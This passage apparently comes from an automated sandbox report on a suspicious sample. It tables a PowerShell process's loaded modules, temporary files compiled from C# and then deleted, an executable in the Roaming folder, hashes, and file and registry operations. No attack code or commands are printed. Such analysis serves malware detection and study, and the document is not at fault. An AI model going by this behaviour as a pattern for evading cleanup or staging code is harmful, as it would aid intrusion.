| system.directoryservices.ni.dll | 0x7fedf370000 | 0x7fedf504fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fedf510000 | 0x7fedf67bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedf680000 | 0x7fedfd24fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedfd30000 | 0x7fedfd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedfd70000 | 0x7fedfe87fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedfe90000 | 0x7fee00a5fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee00b0000 | 0x7fee0194fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee01a0000 | 0x7fee0249fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee0250000 | 0x7fee0281fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee0290000 | 0x7fee02f8fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee0300000 | 0x7fee062dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee0630000 | 0x7fee118cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee1190000 | 0x7fee1241fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee1250000 | 0x7fee1c72fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1c80000 | 0x7fee2b5bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2b60000 | 0x7fee34fcfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5c80000 | 0x7fee5d18fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef2ea0000 | 0x7fef2f0efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef82d0000 | 0x7fef82dbfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef82e0000 | 0x7fef8313fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef8d70000 | 0x7fef8deffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef8e70000 | 0x7fef8e7efff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefa5e0000 | 0x7fefa636fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb0d0000 | 0x7fefb0dafff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb100000 | 0x7fefb118fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefb4a0000 | 0x7fefb4ccfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefbe50000 | 0x7fefbea5fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefbeb0000 | 0x7fefbfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc030000 | 0x7fefc223fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefc6f0000 | 0x7fefc6fbfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefc8d0000 | 0x7fefc8edfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd320000 | 0x7fefd342fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefd6c0000 | 0x7fefd6d9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd8c0000 | 0x7fefd8f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefde50000 | 0x7fefebd7fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feff4e0000 | 0x7feff531fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff650000 | 0x7feff826fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff0e000 | 0x7fffff0e000 | 0x7fffff0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 80 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | 0.31 KB |
MD5:
bc0ef14aae02a18d8b668738bd6ff178
SHA1: ab655af267e1c69d87b514390bcbcd32a5fea896 SHA256: 735b8ff809a56cafb3ab868d606d4f0018fb6b68da10852de200c0481e70de0e SSDeep: 6:pAu+H2LvFJDdq++bDdqBn/zpJ23fbqmGsSAE2N/zpJ23fbP:p37LvtMTqnPAE2jMTP |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | 5.00 KB |
MD5:
261afe7fd1afe696f67de05b78ed8262
SHA1: 696392cfcb9feb1721aa7571a6c33d20ab59aa92 SHA256: c83734161ecbd81a7dcc7b7807a862bb2b6c425fcc5b13461449cea72ba30a6e SSDeep: 96:qHptyXHkdDlaNNovdXUvP0HcXvlM0yYK:qhBoNovdXUvO4lMD |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | 0.40 KB |
MD5:
4f13217e1b62d70fea155547324babb0
SHA1: 5d17186589545b6d225c382f9f0a2f9977f56c18 SHA256: 2bfd31f56feae2afce5f7bd3dc74fe41dfd8ef946f13d9b15aebad3e9db8d119 SSDeep: 6:KO/8/LAwmPwRhMuAu+H2LvFJDdq++bDdqBn/zpJ23fbqmGsSAE2N/zpJ23fbzy:K3/NzR37LvtMTqnPAE2jMTG |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | 1.87 KB |
MD5:
7934a2046f960261231745d18ce3cfac
SHA1: 3901d5b803d57228ae031d8cf5cc4a7ad4fe7c0a SHA256: 9ec36bb1ddb33d063abc9d457f25d75a467fa0802318ca427c87afb8f0c0b6c8 SSDeep: 48:Joi+n+oeZIFcIDe/ijsV/8zph0RSEyeR12:JoYoCccqGCsVMeLm |
|
|
Host Behavior
File (266)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.err | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
10 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.err | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | type = file_type |
|
4 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
86 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
7 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 5120, size_out = 5120 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | size = 4096, size_out = 4096 |
|
4 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | size = 1919 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | size = 315 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | size = 406 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 2 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 4096 |
|
4 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 8824 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 42624 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 11964 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 8760 |
|
2 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 61320 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 23360 |
|
2 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 64240 |
|
2 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 26280 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 65536 |
|
3 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 6004 |
|
3 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 40880 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 17520 |
|
2 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 46720 |
|
2 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 33580 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 64360 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | size = 7464 |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.pdb | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.err | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | - |
|
1 |
Registry (192)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
